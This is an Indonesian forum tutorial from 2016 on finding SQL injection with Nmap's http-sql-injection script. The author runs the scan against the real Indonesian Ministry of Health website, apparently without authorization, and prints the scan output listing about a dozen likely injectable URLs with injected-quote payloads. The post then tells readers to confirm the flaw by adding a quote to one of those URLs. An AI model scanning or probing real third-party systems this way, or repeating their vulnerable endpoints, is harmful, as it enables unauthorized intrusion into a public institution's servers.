Scan vuln sql injection with NMAP

Scan vuln sql injection with NMAP

by teh - 03-09-2016 at 11:47 PM

teh

Junior Member

Posts:

Joined:

Mar 2016

Likes:

Reputation:

2 Year Of Member

Posted: 03-09-2016, 11:47 PM (This post was last modified: 03-10-2016, 08:14 AM by teh.)

saya mau sharing tentang mencari celah sql injection dengan script yang ada di NMAP. maaf bila ada kesalahan mohon di koreksi mastah :blush:
command line yang saya gunakan

Code:
nmap -sV --script=http-sql-injection www.target.com -Pn -p 80

keterangan :
-sV : untuk mendeteksi versi pada sistem operasi
--script : untuk memanggil script nmap yang akan di gunakan (untuk mencari script nmap yang lain nya ketik locate *.nse)
-Pn : untuk melewati proses identifikasi host yang sedang hidup (no ping)
-p : port yang digunakan

disini saya akan test situs http://www.depkes.go.id

Code:
tehmanis@0dayWL:~$ nmap -sV --script=http-sql-injection www.depkes.go.id -Pn -p 80

Starting Nmap 7.01 ( https://nmap.org ) at 2016-03-10 03:01 EST

Nmap scan report for www.depkes.go.id (202.70.136.4)

Host is up (0.026s latency).

PORT   STATE SERVICE VERSION

80/tcp open  http    Apache httpd 2.2.15 ((Oracle))

|_http-server-header: Apache/2.2.15 (Oracle)

| http-sql-injection: 

|   Possible sqli for queries:

|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page

|     http://www.depkes.go.id/pdf.php?id=a01%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

|     http://www.depkes.go.id/?pg=profil_kesehatan_provinsi%27%20OR%20sqlspider&act=page

|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider

|     http://www.depkes.go.id/pdf.php?id=16030500001%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

|     http://www.depkes.go.id/index.php?lg=LN01%27%20OR%20sqlspider

|_    http://www.depkes.go.id/index.php?lg=LN02%27%20OR%20sqlspider

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 71.95 seconds

nah ternyata pada situs tersebut terdapat vulneralbility sql injection, untuk memastikan nya kita buka browser lalu copas salah satu link vuneralbility nya
contoh :

Code:
http://www.depkes.go.id/index.php?lg=LN01

tambahkan kutip pada akhir alamat url, dan ini hasil nya.

[Image: 10qb7e1.jpg]

ini saya buat video nya juga cekidoot
semoga bermanfaat dan mohon maaf bilang banyak salah dalam thread ini :blush:

Message

Find Posts

Create an account

Create a free account today and start posting right away. It only takes a few seconds.

Log into an existing account.

View a Printable Version

1 Guest(s)

Forum Backbox Indonesia adalah salah satu media pembelajaran bagi siapa saja yang ingin belajar mengenai dunia Open Source khususnya untuk memperdalam Backbox Linux.